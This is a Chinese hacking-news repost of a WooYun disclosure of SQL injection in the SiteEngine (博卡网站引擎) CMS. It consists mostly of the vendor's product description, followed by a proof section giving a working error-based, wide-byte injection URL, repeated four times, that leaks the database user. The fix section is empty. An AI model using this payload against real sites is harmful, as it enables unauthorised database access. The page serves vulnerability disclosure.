记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

博卡网站引擎管理系统注入漏洞

2016-05-27 05:00

http://**.**.**.**/bugs/wooyun-2015-0134372

网站引擎(SiteEngine,全称:博卡网站引擎管理系统)这么有名的CMS居然没人提交漏洞。



开发商是这个http://**.**.**.**/index.php?id=1 北京网站建设公司,网站建设解决方案,软件开发服务提供商-博卡先锋



看看介绍吧:



http://**.**.**.**/index.php?id=181&tab1=1&tab2=1







  网站引擎(SiteEngine,全称:博卡网站引擎管理系统),是北京博卡先锋软件开发有限公司于2002年自主研发的,具有知识产权(软件著作权登记号:2003SR13068)的一款营销型网站建设管理类软件。同时,网站引擎于2004年通过中国软件评测中心CSTC软件产品测试,是获国家信息产业部认可的软件产品(软件产品登记号:京DGY-2004-0849)。



网站引擎软件基于PHP程序和Mysql数据库开发,完全采用B/S体系结构,无客户端,跨Unix/Lin-ux/FreeBSD/Solaris/Windows(2000/XP/2003/Vista)等操作系统平台应用,是网站建设类软件与CMS类软件中的领航者。



网站引擎软件坚持“让一切更简单”的技术理念,集网站建设、网站运营、网站推广、网站营销、网站维护于一体,经过八年开发历程,软件已成功升级至v7.1.0版本,并且由原来的单一版本发展为面向更多对象的三大软件版本(网络营销版、电子商务版、企业门户版),全面应用于党政机关、事业单位、大型集团、中小企业的信息化建设与电子商务领域。



网站引擎自面世以来,得到了广大用户群体的认可与支持,在海内外拥有众多的客户,目前,网站引擎已拥有100000以上的企业级用户与个人用户,市场范围已由大中华地区扩展到全球区域。



还是蛮多人使用这个CMS的,看看搜索引擎吧:、

QQ20160223-2@2x.png

漏洞证明:

code 区域
http://**.**.**.**/index.php?id=1%df%27%20OR%20(SELECT%204575%20FROM(SELECT%20COUNT(*),CONCAT(0x7e21,user(),0x217e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20--%20QmYk



http://**.**.**.**/index.php?id=1%df%27%20OR%20(SELECT%204575%20FROM(SELECT%20COUNT(*),CONCAT(0x7e21,user(),0x217e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20--%20QmYk





http://**.**.**.**/index.php?id=1%df%27%20OR%20(SELECT%204575%20FROM(SELECT%20COUNT(*),CONCAT(0x7e21,user(),0x217e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20--%20QmYk





http://**.**.**.**/index.php?id=1%df%27%20OR%20(SELECT%204575%20FROM(SELECT%20COUNT(*),CONCAT(0x7e21,user(),0x217e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20--%20QmYk







QQ20160223-3@2x.png





QQ20160223-4@2x.png





QQ20160223-5@2x.png





QQ20160223-6@2x.png

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0177884

阅读:71079 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“博卡网站引擎管理系统注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云